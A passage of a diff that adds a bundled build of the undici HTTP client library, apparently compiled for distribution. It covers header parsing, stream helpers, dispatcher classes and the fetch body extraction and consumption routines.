parseOrigin (url) { + url = parseURL(url) + + if (url.pathname !== '/' || url.search || url.hash) { + throw new InvalidArgumentError('invalid url') + } + + return url +} + +function getHostname (host) { + if (host[0] === '[') { + const idx = host.indexOf(']') + + assert(idx !== -1) + return host.substring(1, idx) + } + + const idx = host.indexOf(':') + if (idx === -1) return host + + return host.substring(0, idx) +} + +// IP addresses are not valid server names per RFC6066 +// > Currently, the only server names supported are DNS hostnames +function getServerName (host) { + if (!host) { + return null + } + + assert.strictEqual(typeof host, 'string') + + const servername = getHostname(host) + if (net.isIP(servername)) { + return '' + } + + return servername +} + +function deepClone (obj) { + return JSON.parse(JSON.stringify(obj)) +} + +function isAsyncIterable (obj) { + return !!(obj != null && typeof obj[Symbol.asyncIterator] === 'function') +} + +function isIterable (obj) { + return !!(obj != null && (typeof obj[Symbol.iterator] === 'function' || typeof obj[Symbol.asyncIterator] === 'function')) +} + +function bodyLength (body) { + if (body == null) { + return 0 + } else if (isStream(body)) { + const state = body._readableState + return state && state.objectMode === false && state.ended === true && Number.isFinite(state.length) + ? state.length + : null + } else if (isBlobLike(body)) { + return body.size != null ? body.size : null + } else if (isBuffer(body)) { + return body.byteLength + } + + return null +} + +function isDestroyed (stream) { + return !stream || !!(stream.destroyed || stream[kDestroyed]) +} + +function isReadableAborted (stream) { + const state = stream && stream._readableState + return isDestroyed(stream) && state && !state.endEmitted +} + +function destroy (stream, err) { + if (stream == null || !isStream(stream) || isDestroyed(stream)) { + return + } + + if (typeof stream.destroy === 'function') { + if (Object.getPrototypeOf(stream).constructor === IncomingMessage) { + // See: https://github.com/nodejs/node/pull/38505/files + stream.socket = null + } + + stream.destroy(err) + } else if (err) { + process.nextTick((stream, err) => { + stream.emit('error', err) + }, stream, err) + } + + if (stream.destroyed !== true) { + stream[kDestroyed] = true + } +} + +const KEEPALIVE_TIMEOUT_EXPR = /timeout=(\d+)/ +function parseKeepAliveTimeout (val) { + const m = val.toString().match(KEEPALIVE_TIMEOUT_EXPR) + return m ? parseInt(m[1], 10) * 1000 : null +} + +function parseHeaders (headers, obj = {}) { + // For H2 support + if (!Array.isArray(headers)) return headers + + for (let i = 0; i < headers.length; i += 2) { + const key = headers[i].toString().toLowerCase() + let val = obj[key] + + if (!val) { + if (Array.isArray(headers[i + 1])) { + obj[key] = headers[i + 1].map(x => x.toString('utf8')) + } else { + obj[key] = headers[i + 1].toString('utf8') + } + } else { + if (!Array.isArray(val)) { + val = [val] + obj[key] = val + } + val.push(headers[i + 1].toString('utf8')) + } + } + + // See https://github.com/nodejs/node/pull/46528 + if ('content-length' in obj && 'content-disposition' in obj) { + obj['content-disposition'] = Buffer.from(obj['content-disposition']).toString('latin1') + } + + return obj +} + +function parseRawHeaders (headers) { + const ret = [] + let hasContentLength = false + let contentDispositionIdx = -1 + + for (let n = 0; n < headers.length; n += 2) { + const key = headers[n + 0].toString() + const val = headers[n + 1].toString('utf8') + + if (key.length === 14 && (key === 'content-length' || key.toLowerCase() === 'content-length')) { + ret.push(key, val) + hasContentLength = true + } else if (key.length === 19 && (key === 'content-disposition' || key.toLowerCase() === 'content-disposition')) { + contentDispositionIdx = ret.push(key, val) - 1 + } else { + ret.push(key, val) + } + } + + // See https://github.com/nodejs/node/pull/46528 + if (hasContentLength && contentDispositionIdx !== -1) { + ret[contentDispositionIdx] = Buffer.from(ret[contentDispositionIdx]).toString('latin1') + } + + return ret +} + +function isBuffer (buffer) { + // See, https://github.com/mcollina/undici/pull/319 + return buffer instanceof Uint8Array || Buffer.isBuffer(buffer) +} + +function validateHandler (handler, method, upgrade) { + if (!handler || typeof handler !== 'object') { + throw new InvalidArgumentError('handler must be an object') + } + + if (typeof handler.onConnect !== 'function') { + throw new InvalidArgumentError('invalid onConnect method') + } + + if (typeof handler.onError !== 'function') { + throw new InvalidArgumentError('invalid onError method') + } + + if (typeof handler.onBodySent !== 'function' && handler.onBodySent !== undefined) { + throw new InvalidArgumentError('invalid onBodySent method') + } + + if (upgrade || method === 'CONNECT') { + if (typeof handler.onUpgrade !== 'function') { + throw new InvalidArgumentError('invalid onUpgrade method') + } + } else { + if (typeof handler.onHeaders !== 'function') { + throw new InvalidArgumentError('invalid onHeaders method') + } + + if (typeof handler.onData !== 'function') { + throw new InvalidArgumentError('invalid onData method') + } + + if (typeof handler.onComplete !== 'function') { + throw new InvalidArgumentError('invalid onComplete method') + } + } +} + +// A body is disturbed if it has been read from and it cannot +// be re-used without losing state or data. +function isDisturbed (body) { + return !!(body && ( + stream.isDisturbed + ? stream.isDisturbed(body) || body[kBodyUsed] // TODO (fix): Why is body[kBodyUsed] needed? + : body[kBodyUsed] || + body.readableDidRead || + (body._readableState && body._readableState.dataEmitted) || + isReadableAborted(body) + )) +} + +function isErrored (body) { + return !!(body && ( + stream.isErrored + ? stream.isErrored(body) + : /state: 'errored'/.test(nodeUtil.inspect(body) + ))) +} + +function isReadable (body) { + return !!(body && ( + stream.isReadable + ? stream.isReadable(body) + : /state: 'readable'/.test(nodeUtil.inspect(body) + ))) +} + +function getSocketInfo (socket) { + return { + localAddress: socket.localAddress, + localPort: socket.localPort, + remoteAddress: socket.remoteAddress, + remotePort: socket.remotePort, + remoteFamily: socket.remoteFamily, + timeout: socket.timeout, + bytesWritten: socket.bytesWritten, + bytesRead: socket.bytesRead + } +} + +async function * convertIterableToBuffer (iterable) { + for await (const chunk of iterable) { + yield Buffer.isBuffer(chunk) ? chunk : Buffer.from(chunk) + } +} + +let ReadableStream +function ReadableStreamFrom (iterable) { + if (!ReadableStream) { + ReadableStream = (__nccwpck_require__(5356).ReadableStream) + } + + if (ReadableStream.from) { + return ReadableStream.from(convertIterableToBuffer(iterable)) + } + + let iterator + return new ReadableStream( + { + async start () { + iterator = iterable[Symbol.asyncIterator]() + }, + async pull (controller) { + const { done, value } = await iterator.next() + if (done) { + queueMicrotask(() => { + controller.close() + }) + } else { + const buf = Buffer.isBuffer(value) ? value : Buffer.from(value) + controller.enqueue(new Uint8Array(buf)) + } + return controller.desiredSize > 0 + }, + async cancel (reason) { + await iterator.return() + } + }, + 0 + ) +} + +// The chunk should be a FormData instance and contains +// all the required methods. +function isFormDataLike (object) { + return ( + object && + typeof object === 'object' && + typeof object.append === 'function' && + typeof object.delete === 'function' && + typeof object.get === 'function' && + typeof object.getAll === 'function' && + typeof object.has === 'function' && + typeof object.set === 'function' && + object[Symbol.toStringTag] === 'FormData' + ) +} + +function throwIfAborted (signal) { + if (!signal) { return } + if (typeof signal.throwIfAborted === 'function') { + signal.throwIfAborted() + } else { + if (signal.aborted) { + // DOMException not available < v17.0.0 + const err = new Error('The operation was aborted') + err.name = 'AbortError' + throw err + } + } +} + +function addAbortListener (signal, listener) { + if ('addEventListener' in signal) { + signal.addEventListener('abort', listener, { once: true }) + return () => signal.removeEventListener('abort', listener) + } + signal.addListener('abort', listener) + return () => signal.removeListener('abort', listener) +} + +const hasToWellFormed = !!String.prototype.toWellFormed + +/** + * @param {string} val + */ +function toUSVString (val) { + if (hasToWellFormed) { + return `${val}`.toWellFormed() + } else if (nodeUtil.toUSVString) { + return nodeUtil.toUSVString(val) + } + + return `${val}` +} + +// Parsed accordingly to RFC 9110 +// https://www.rfc-editor.org/rfc/rfc9110#field.content-range +function parseRangeHeader (range) { + if (range == null || range === '') return { start: 0, end: null, size: null } + + const m = range ? range.match(/^bytes (\d+)-(\d+)\/(\d+)?$/) : null + return m + ? { + start: parseInt(m[1]), + end: m[2] ? parseInt(m[2]) : null, + size: m[3] ? parseInt(m[3]) : null + } + : null +} + +const kEnumerableProperty = Object.create(null) +kEnumerableProperty.enumerable = true + +module.exports = { + kEnumerableProperty, + nop, + isDisturbed, + isErrored, + isReadable, + toUSVString, + isReadableAborted, + isBlobLike, + parseOrigin, + parseURL, + getServerName, + isStream, + isIterable, + isAsyncIterable, + isDestroyed, + parseRawHeaders, + parseHeaders, + parseKeepAliveTimeout, + destroy, + bodyLength, + deepClone, + ReadableStreamFrom, + isBuffer, + validateHandler, + getSocketInfo, + isFormDataLike, + buildURL, + throwIfAborted, + addAbortListener, + parseRangeHeader, + nodeMajor, + nodeMinor, + nodeHasAutoSelectFamily: nodeMajor > 18 || (nodeMajor === 18 && nodeMinor >= 13), + safeHTTPMethods: ['GET', 'HEAD', 'OPTIONS', 'TRACE'] +} + + +/***/ }), + +/***/ 4839: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const Dispatcher = __nccwpck_require__(412) +const { + ClientDestroyedError, + ClientClosedError, + InvalidArgumentError +} = __nccwpck_require__(8045) +const { kDestroy, kClose, kDispatch, kInterceptors } = __nccwpck_require__(2785) + +const kDestroyed = Symbol('destroyed') +const kClosed = Symbol('closed') +const kOnDestroyed = Symbol('onDestroyed') +const kOnClosed = Symbol('onClosed') +const kInterceptedDispatch = Symbol('Intercepted Dispatch') + +class DispatcherBase extends Dispatcher { + constructor () { + super() + + this[kDestroyed] = false + this[kOnDestroyed] = null + this[kClosed] = false + this[kOnClosed] = [] + } + + get destroyed () { + return this[kDestroyed] + } + + get closed () { + return this[kClosed] + } + + get interceptors () { + return this[kInterceptors] + } + + set interceptors (newInterceptors) { + if (newInterceptors) { + for (let i = newInterceptors.length - 1; i >= 0; i--) { + const interceptor = this[kInterceptors][i] + if (typeof interceptor !== 'function') { + throw new InvalidArgumentError('interceptor must be an function') + } + } + } + + this[kInterceptors] = newInterceptors + } + + close (callback) { + if (callback === undefined) { + return new Promise((resolve, reject) => { + this.close((err, data) => { + return err ? reject(err) : resolve(data) + }) + }) + } + + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + if (this[kDestroyed]) { + queueMicrotask(() => callback(new ClientDestroyedError(), null)) + return + } + + if (this[kClosed]) { + if (this[kOnClosed]) { + this[kOnClosed].push(callback) + } else { + queueMicrotask(() => callback(null, null)) + } + return + } + + this[kClosed] = true + this[kOnClosed].push(callback) + + const onClosed = () => { + const callbacks = this[kOnClosed] + this[kOnClosed] = null + for (let i = 0; i < callbacks.length; i++) { + callbacks[i](null, null) + } + } + + // Should not error. + this[kClose]() + .then(() => this.destroy()) + .then(() => { + queueMicrotask(onClosed) + }) + } + + destroy (err, callback) { + if (typeof err === 'function') { + callback = err + err = null + } + + if (callback === undefined) { + return new Promise((resolve, reject) => { + this.destroy(err, (err, data) => { + return err ? /* istanbul ignore next: should never error */ reject(err) : resolve(data) + }) + }) + } + + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + if (this[kDestroyed]) { + if (this[kOnDestroyed]) { + this[kOnDestroyed].push(callback) + } else { + queueMicrotask(() => callback(null, null)) + } + return + } + + if (!err) { + err = new ClientDestroyedError() + } + + this[kDestroyed] = true + this[kOnDestroyed] = this[kOnDestroyed] || [] + this[kOnDestroyed].push(callback) + + const onDestroyed = () => { + const callbacks = this[kOnDestroyed] + this[kOnDestroyed] = null + for (let i = 0; i < callbacks.length; i++) { + callbacks[i](null, null) + } + } + + // Should not error. + this[kDestroy](err).then(() => { + queueMicrotask(onDestroyed) + }) + } + + [kInterceptedDispatch] (opts, handler) { + if (!this[kInterceptors] || this[kInterceptors].length === 0) { + this[kInterceptedDispatch] = this[kDispatch] + return this[kDispatch](opts, handler) + } + + let dispatch = this[kDispatch].bind(this) + for (let i = this[kInterceptors].length - 1; i >= 0; i--) { + dispatch = this[kInterceptors][i](dispatch) + } + this[kInterceptedDispatch] = dispatch + return dispatch(opts, handler) + } + + dispatch (opts, handler) { + if (!handler || typeof handler !== 'object') { + throw new InvalidArgumentError('handler must be an object') + } + + try { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('opts must be an object.') + } + + if (this[kDestroyed] || this[kOnDestroyed]) { + throw new ClientDestroyedError() + } + + if (this[kClosed]) { + throw new ClientClosedError() + } + + return this[kInterceptedDispatch](opts, handler) + } catch (err) { + if (typeof handler.onError !== 'function') { + throw new InvalidArgumentError('invalid onError method') + } + + handler.onError(err) + + return false + } + } +} + +module.exports = DispatcherBase + + +/***/ }), + +/***/ 412: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const EventEmitter = __nccwpck_require__(2361) + +class Dispatcher extends EventEmitter { + dispatch () { + throw new Error('not implemented') + } + + close () { + throw new Error('not implemented') + } + + destroy () { + throw new Error('not implemented') + } +} + +module.exports = Dispatcher + + +/***/ }), + +/***/ 1472: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const Busboy = __nccwpck_require__(727) +const util = __nccwpck_require__(3983) +const { + ReadableStreamFrom, + isBlobLike, + isReadableStreamLike, + readableStreamClose, + createDeferredPromise, + fullyReadBody +} = __nccwpck_require__(2538) +const { FormData } = __nccwpck_require__(2015) +const { kState } = __nccwpck_require__(5861) +const { webidl } = __nccwpck_require__(1744) +const { DOMException, structuredClone } = __nccwpck_require__(1037) +const { Blob, File: NativeFile } = __nccwpck_require__(4300) +const { kBodyUsed } = __nccwpck_require__(2785) +const assert = __nccwpck_require__(9491) +const { isErrored } = __nccwpck_require__(3983) +const { isUint8Array, isArrayBuffer } = __nccwpck_require__(9830) +const { File: UndiciFile } = __nccwpck_require__(8511) +const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) + +let ReadableStream = globalThis.ReadableStream + +/** @type {globalThis['File']} */ +const File = NativeFile ?? UndiciFile +const textEncoder = new TextEncoder() +const textDecoder = new TextDecoder() + +// https://fetch.spec.whatwg.org/#concept-bodyinit-extract +function extractBody (object, keepalive = false) { + if (!ReadableStream) { + ReadableStream = (__nccwpck_require__(5356).ReadableStream) + } + + // 1. Let stream be null. + let stream = null + + // 2. If object is a ReadableStream object, then set stream to object. + if (object instanceof ReadableStream) { + stream = object + } else if (isBlobLike(object)) { + // 3. Otherwise, if object is a Blob object, set stream to the + // result of running object’s get stream. + stream = object.stream() + } else { + // 4. Otherwise, set stream to a new ReadableStream object, and set + // up stream. + stream = new ReadableStream({ + async pull (controller) { + controller.enqueue( + typeof source === 'string' ? textEncoder.encode(source) : source + ) + queueMicrotask(() => readableStreamClose(controller)) + }, + start () {}, + type: undefined + }) + } + + // 5. Assert: stream is a ReadableStream object. + assert(isReadableStreamLike(stream)) + + // 6. Let action be null. + let action = null + + // 7. Let source be null. + let source = null + + // 8. Let length be null. + let length = null + + // 9. Let type be null. + let type = null + + // 10. Switch on object: + if (typeof object === 'string') { + // Set source to the UTF-8 encoding of object. + // Note: setting source to a Uint8Array here breaks some mocking assumptions. + source = object + + // Set type to `text/plain;charset=UTF-8`. + type = 'text/plain;charset=UTF-8' + } else if (object instanceof URLSearchParams) { + // URLSearchParams + + // spec says to run application/x-www-form-urlencoded on body.list + // this is implemented in Node.js as apart of an URLSearchParams instance toString method + // See: https://github.com/nodejs/node/blob/e46c680bf2b211bbd52cf959ca17ee98c7f657f5/lib/internal/url.js#L490 + // and https://github.com/nodejs/node/blob/e46c680bf2b211bbd52cf959ca17ee98c7f657f5/lib/internal/url.js#L1100 + + // Set source to the result of running the application/x-www-form-urlencoded serializer with object’s list. + source = object.toString() + + // Set type to `application/x-www-form-urlencoded;charset=UTF-8`. + type = 'application/x-www-form-urlencoded;charset=UTF-8' + } else if (isArrayBuffer(object)) { + // BufferSource/ArrayBuffer + + // Set source to a copy of the bytes held by object. + source = new Uint8Array(object.slice()) + } else if (ArrayBuffer.isView(object)) { + // BufferSource/ArrayBufferView + + // Set source to a copy of the bytes held by object. + source = new Uint8Array(object.buffer.slice(object.byteOffset, object.byteOffset + object.byteLength)) + } else if (util.isFormDataLike(object)) { + const boundary = `----formdata-undici-0${`${Math.floor(Math.random() * 1e11)}`.padStart(11, '0')}` + const prefix = `--${boundary}\r\nContent-Disposition: form-data` + + /*! formdata-polyfill. MIT License. Jimmy Wärting */ + const escape = (str) => + str.replace(/\n/g, '%0A').replace(/\r/g, '%0D').replace(/"/g, '%22') + const normalizeLinefeeds = (value) => value.replace(/\r?\n|\r/g, '\r\n') + + // Set action to this step: run the multipart/form-data + // encoding algorithm, with object’s entry list and UTF-8. + // - This ensures that the body is immutable and can't be changed afterwords + // - That the content-length is calculated in advance. + // - And that all parts are pre-encoded and ready to be sent. + + const blobParts = [] + const rn = new Uint8Array([13, 10]) // '\r\n' + length = 0 + let hasUnknownSizeValue = false + + for (const [name, value] of object) { + if (typeof value === 'string') { + const chunk = textEncoder.encode(prefix + + `; name="${escape(normalizeLinefeeds(name))}"` + + `\r\n\r\n${normalizeLinefeeds(value)}\r\n`) + blobParts.push(chunk) + length += chunk.byteLength + } else { + const chunk = textEncoder.encode(`${prefix}; name="${escape(normalizeLinefeeds(name))}"` + + (value.name ? `; filename="${escape(value.name)}"` : '') + '\r\n' + + `Content-Type: ${ + value.type || 'application/octet-stream' + }\r\n\r\n`) + blobParts.push(chunk, value, rn) + if (typeof value.size === 'number') { + length += chunk.byteLength + value.size + rn.byteLength + } else { + hasUnknownSizeValue = true + } + } + } + + const chunk = textEncoder.encode(`--${boundary}--`) + blobParts.push(chunk) + length += chunk.byteLength + if (hasUnknownSizeValue) { + length = null + } + + // Set source to object. + source = object + + action = async function * () { + for (const part of blobParts) { + if (part.stream) { + yield * part.stream() + } else { + yield part + } + } + } + + // Set type to `multipart/form-data; boundary=`, + // followed by the multipart/form-data boundary string generated + // by the multipart/form-data encoding algorithm. + type = 'multipart/form-data; boundary=' + boundary + } else if (isBlobLike(object)) { + // Blob + + // Set source to object. + source = object + + // Set length to object’s size. + length = object.size + + // If object’s type attribute is not the empty byte sequence, set + // type to its value. + if (object.type) { + type = object.type + } + } else if (typeof object[Symbol.asyncIterator] === 'function') { + // If keepalive is true, then throw a TypeError. + if (keepalive) { + throw new TypeError('keepalive') + } + + // If object is disturbed or locked, then throw a TypeError. + if (util.isDisturbed(object) || object.locked) { + throw new TypeError( + 'Response body object should not be disturbed or locked' + ) + } + + stream = + object instanceof ReadableStream ? object : ReadableStreamFrom(object) + } + + // 11. If source is a byte sequence, then set action to a + // step that returns source and length to source’s length. + if (typeof source === 'string' || util.isBuffer(source)) { + length = Buffer.byteLength(source) + } + + // 12. If action is non-null, then run these steps in in parallel: + if (action != null) { + // Run action. + let iterator + stream = new ReadableStream({ + async start () { + iterator = action(object)[Symbol.asyncIterator]() + }, + async pull (controller) { + const { value, done } = await iterator.next() + if (done) { + // When running action is done, close stream. + queueMicrotask(() => { + controller.close() + }) + } else { + // Whenever one or more bytes are available and stream is not errored, + // enqueue a Uint8Array wrapping an ArrayBuffer containing the available + // bytes into stream. + if (!isErrored(stream)) { + controller.enqueue(new Uint8Array(value)) + } + } + return controller.desiredSize > 0 + }, + async cancel (reason) { + await iterator.return() + }, + type: undefined + }) + } + + // 13. Let body be a body whose stream is stream, source is source, + // and length is length. + const body = { stream, source, length } + + // 14. Return (body, type). + return [body, type] +} + +// https://fetch.spec.whatwg.org/#bodyinit-safely-extract +function safelyExtractBody (object, keepalive = false) { + if (!ReadableStream) { + // istanbul ignore next + ReadableStream = (__nccwpck_require__(5356).ReadableStream) + } + + // To safely extract a body and a `Content-Type` value from + // a byte sequence or BodyInit object object, run these steps: + + // 1. If object is a ReadableStream object, then: + if (object instanceof ReadableStream) { + // Assert: object is neither disturbed nor locked. + // istanbul ignore next + assert(!util.isDisturbed(object), 'The body has already been consumed.') + // istanbul ignore next + assert(!object.locked, 'The stream is locked.') + } + + // 2. Return the results of extracting object. + return extractBody(object, keepalive) +} + +function cloneBody (body) { + // To clone a body body, run these steps: + + // https://fetch.spec.whatwg.org/#concept-body-clone + + // 1. Let « out1, out2 » be the result of teeing body’s stream. + const [out1, out2] = body.stream.tee() + const out2Clone = structuredClone(out2, { transfer: [out2] }) + // This, for whatever reasons, unrefs out2Clone which allows + // the process to exit by itself. + const [, finalClone] = out2Clone.tee() + + // 2. Set body’s stream to out1. + body.stream = out1 + + // 3. Return a body whose stream is out2 and other members are copied from body. + return { + stream: finalClone, + length: body.length, + source: body.source + } +} + +async function * consumeBody (body) { + if (body) { + if (isUint8Array(body)) { + yield body + } else { + const stream = body.stream + + if (util.isDisturbed(stream)) { + throw new TypeError('The body has already been consumed.') + } + + if (stream.locked) { + throw new TypeError('The stream is locked.') + } + + // Compat. + stream[kBodyUsed] = true + + yield * stream + } + } +} + +function throwIfAborted (state) { + if (state.aborted) { + throw new DOMException('The operation was aborted.', 'AbortError') + } +} + +function bodyMixinMethods (instance) { + const methods = { + blob () { + // The blob() method steps are to return the result of + // running consume body with this and the following step + // given a byte sequence bytes: return a Blob whose + // contents are bytes and whose type attribute is this’s + // MIME type. + return specConsumeBody(this, (bytes) => { + let mimeType = bodyMimeType(this) + + if (mimeType === 'failure') { + mimeType = '' + } else if (mimeType) { + mimeType = serializeAMimeType(mimeType) + } + + // Return a Blob whose contents are bytes and type attribute + // is mimeType. + return new Blob([bytes], { type: mimeType }) + }, instance) + }, + + arrayBuffer () { + // The arrayBuffer() method steps are to return the result + // of running consume body with this and the following step + // given a byte sequence bytes: return a new ArrayBuffer + // whose contents are bytes. + return specConsumeBody(this, (bytes) => { + return new Uint8Array(bytes).buffer + }, instance) + }, + + text () { + // The text() method steps are to return the result of running + // consume body with this and UTF-8 decode. + return specConsumeBody(this, utf8DecodeBytes, instance) + }, + + json () { + // The json() method steps are to return the result of running + // consume body with this and parse JSON from bytes. + return specConsumeBody(this, parseJSONFromBytes, instance) + }, + + async formData () { + webidl.brandCheck(this, instance) + + throwIfAborted(this[kState]) + + const contentType = this.headers.get('Content-Type') + + // If mimeType’s essence is "multipart/form-data", then: + if (/multipart\/form-data/.test(contentType)) { + const headers = {} + for (const [key, value] of this.headers) headers[key.toLowerCase()] = value + + const responseFormData = new FormData() + + let busboy + + try { + busboy = new Busboy({ + headers, + preservePath: true + }) + } catch (err) { + throw new DOMException(`${err}`, 'AbortError') + } + + busboy.on('field', (name, value) => { + responseFormData.append(name, value) + }) + busboy.on('file', (name, value, filename, encoding, mimeType) => { + const chunks = [] + + if (encoding === 'base64' || encoding.toLowerCase() === 'base64') { + let base64chunk = '' + + value.on('data', (chunk) => { + base64chunk += chunk.toString().replace(/[\r\n]/gm, '') + + const end = base64chunk.length - base64chunk.length % 4 + chunks.push(Buffer.from(base64chunk.slice(0, end), 'base64')) + + base64chunk = base64chunk.slice(end) + }) + value.on('end', () => { + chunks.push(Buffer.from(base64chunk, 'base64')) + responseFormData.append(name, new File(chunks, filename, { type: mimeType })) + }) + } else { + value.on('data', (chunk) => { + chunks.push(chunk) + }) + value.on('end', () => { + responseFormData.append(name, new File(chunks, filename, { type: mimeType })) + }) + } + }) + + const busboyResolve = new Promise((resolve, reject) => { + busboy.on('finish', resolve) + busboy.on('error', (err) => reject(new TypeError(err))) + }) + + if (this.body !== null) for await (const chunk of consumeBody(this[kState].body)) busboy.write(chunk) + busboy.end() + await busboyResolve + + return responseFormData + } else if (/application\/x-www-form-urlencoded/.test(contentType)) { + // Otherwise, if mimeType’s essence is "application/x-www-form-urlencoded", then: + + // 1. Let entries be the result of parsing bytes. + let entries + try { + let text = '' + // application/x-www-form-urlencoded parser will keep the BOM. + // https://url.spec.whatwg.org/#concept-urlencoded-parser + // Note that streaming decoder is stateful and cannot be reused + const streamingDecoder = new TextDecoder('utf-8', { ignoreBOM: true }) + + for await (const chunk of consumeBody(this[kState].body)) { + if (!isUint8Array(chunk)) { + throw new TypeError('Expected Uint8Array chunk') + } + text += streamingDecoder.decode(chunk, { stream: true }) + } + text += streamingDecoder.decode() + entries = new URLSearchParams(text) + } catch (err) { + // istanbul ignore next: Unclear when new URLSearchParams can fail on a string. + // 2. If entries is failure, then throw a TypeError. + throw Object.assign(new TypeError(), { cause: err }) + } + + // 3. Return a new FormData object whose entries are entries. + const formData = new FormData() + for (const [name, value] of entries) { + formData.append(name, value) + } + return formData + } else { + // Wait a tick before checking if the request has been aborted. + // Otherwise, a TypeError can be thrown when an AbortError should. + await Promise.resolve() + + throwIfAborted(this[kState]) + + // Otherwise, throw a TypeError. + throw webidl.errors.exception({ + header: `${instance.name}.formData`, + message: 'Could not parse content as FormData.' + }) + } + } + } + + return methods +} + +function mixinBody (prototype) { + Object.assign(prototype.prototype, bodyMixinMethods(prototype)) +} + +/** + * @see https://fetch.spec.whatwg.org/#concept-body-consume-body + * @param {Response|Request} object + * @param {(value: unknown) => unknown} convertBytesToJSValue + * @param {Response|Request} instance + */ +async function specConsumeBody (object, convertBytesToJSValue, instance) { + webidl.brandCheck(object, instance) + + throwIfAborted(object[kState]) + + // 1. If object is unusable, then return a promise rejected + // with a TypeError. + if (bodyUnusable(object[kState].body)) { + throw new TypeError('Body is unusable') + } + + // 2. Let promise be a new promise. + const promise = createDeferredPromise() + + // 3. Let errorSteps given error be to reject promise with error. + const errorSteps = (error) => promise.reject(error) + + // 4. Let successSteps given a byte sequence data be to resolve + // promise with the result of running convertBytesToJSValue + // with data. If that threw an exception, then run errorSteps + // with that exception. + const successSteps = (data) => { + try { + promise.resolve(convertBytesToJSValue(data)) + } catch (e) { + errorSteps(e) + } + } + + // 5. If object’s body is null, then run successSteps with an + // empty byte sequence. + if (object[kState].body == null) { + successSteps(new Uint8Array()) + return promise.promise + } + + // 6. Otherwise, fully read object’s body given successSteps, + // errorSteps, and object’s relevant global object. + await fullyReadBody(object[kState].body, successSteps, errorSteps) + + // 7. Return promise. + return promise.promise +} + +// https://fetch.spec.whatwg.org/#body-unusable +function bodyUnusable (body) { + // An object including the Body interface mixin is + // said to be unusable if its body is non-null and + // its body’s stream is disturbed or locked. + return body != null && (body.stream.locked || util.isDisturbed(body.stream)) +} + +/** + * @see https://encoding.spec.whatwg.org/#utf-8-decode + * @param {Buffer} buffer + */ +function utf8DecodeBytes (buffer) { + if (buffer.length === 0) { + return '' + } + + // 1. Let buffer be the result of peeking three bytes from + // ioQueue, converted to a byte sequence. + + // 2. If buffer is 0xEF 0xBB 0xBF, then read three + // bytes from ioQueue. (Do nothing with those bytes.) + if (buffer[0] === 0xEF && buffer[1] === 0xBB && buffer[2] === 0xBF) { + buffer = buffer.subarray(3) + } + + // 3. Process a queue with an instance of UTF-8’s + // decoder, ioQueue, output, and "replacement". + const output = textDecoder.decode(buffer) + + // 4. Return output. + return output +} + +/** + * @see https://infra.spec.whatwg.org/#parse-json-bytes-to-a-javascript-value + * @param {Uint8Array} bytes + */ +function parseJSONFromBytes (bytes) { + return JSON.parse(utf8DecodeBytes(bytes)) +} + +/** + * @see https://fetch.spec.whatwg.org/#concept-body-mime-type + * @param {import('./response').Response|import('./request').Request} object + */ +function bodyMimeType (object) { + const { headersList } = object[kState] + const contentType = headersList.get('content-type') + + if (contentType === null) { + return 'failure' + } + + return parseMIMEType(contentType) +} + +module.exports = { + extractBody, + safelyExtractBody, + cloneBody, + mixinBody +} + + +/***/ }), + +/***/ 1037: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { MessageChannel, receiveMessageOnPort } = __nccwpck_require__(1267) + +const corsSafeListedMethods = ['GET', 'HEAD', 'POST'] +const corsSafeListedMethodsSet = new Set(corsSafeListedMethods) + +const nullBodyStatus = [101, 204, 205, 304] + +const redirectStatus = [301, 302, 303, 307, 308] +const redirectStatusSet = new Set(redirectStatus) + +// https://fetch.spec.whatwg.org/#block-bad-port +const badPorts = [ + '1', '7', '9', '11', '13', '15', '17', '19', '20', '21', '22', '23', '25', '37', '42', '43', '53', '69', '77', '79', + '87', '95', '101', '102', '103', '104', '109', '110', '111', '113', '115', '117', '119', '123', '135', '137', + '139', '143', '161', '179', '389', '427', '465', '512', '513', '514', '515', '526', '530', '531', '532', + '540', '548', '554', '556', '563', '587', '601', '636', '989', '990', '993', '995', '1719', '1720', '1723', + '2049', '3659', '4045', '5060', '5061', '6000', '6566', '6665', '6666', '6667', '6668', '6669', '6697', + '10080' +] + +const badPortsSet = new Set(badPorts) + +// https://w3c.github.io/webappsec-referrer-policy/#referrer-policies +const referrerPolicy = [ + '', + 'no-referrer', + 'no-referrer-when-downgrade', + 'same-origin', + 'origin', + 'strict-origin', + 'origin-when-cross-origin', + 'strict-origin-when-cross-origin', + 'unsafe-url' +] +const referrerPolicySet = new Set(referrerPolicy) + +const requestRedirect = ['follow', 'manual', 'error'] + +const safeMethods = ['GET', 'HEAD', 'OPTIONS', 'TRACE'] +const safeMethodsSet = new Set(safeMethods) + +const requestMode = ['navigate', 'same-origin', 'no-cors', 'cors'] + +const requestCredentials = ['omit', 'same-origin', 'include'] + +const requestCache = [ + 'default', + 'no-store', + 'reload', + 'no-cache', + 'force-cache', + 'only-if-cached' +] + +// https://fetch.spec.whatwg.org/#request-body-header-name +const requestBodyHeader = [ + 'content-encoding', + 'content-language', + 'content-location', + 'content-type', + // See https://github.com/nodejs/undici/issues/2021 + // 'Content-Length' is a forbidden header name, which is typically + // removed in the Headers implementation. However, undici doesn't + // filter out headers, so we add it here. + 'content-length' +] + +// https://fetch.spec.whatwg.org/#enumdef-requestduplex +const requestDuplex = [ + 'half' +] + +// http://fetch.spec.whatwg.org/#forbidden-method +const forbiddenMethods = ['CONNECT', 'TRACE', 'TRACK'] +const forbiddenMethodsSet = new Set(forbiddenMethods) + +const subresource = [ + 'audio', + 'audioworklet', + 'font', + 'image', + 'manifest', + 'paintworklet', + 'script', + 'style', + 'track', + 'video', + 'xslt', + '' +] +const subresourceSet = new Set(subresource) + +/** @type {globalThis['DOMException']} */ +const DOMException = globalThis.DOMException ?? (() => { + // DOMException was only made a global in Node v17.0.0, + // but fetch supports >= v16.8. + try { + atob('~') + } catch (err) { + return Object.getPrototypeOf(err).constructor + } +})() + +let channel + +/** @type {globalThis['structuredClone']} */ +const structuredClone = + globalThis.structuredClone ?? + // 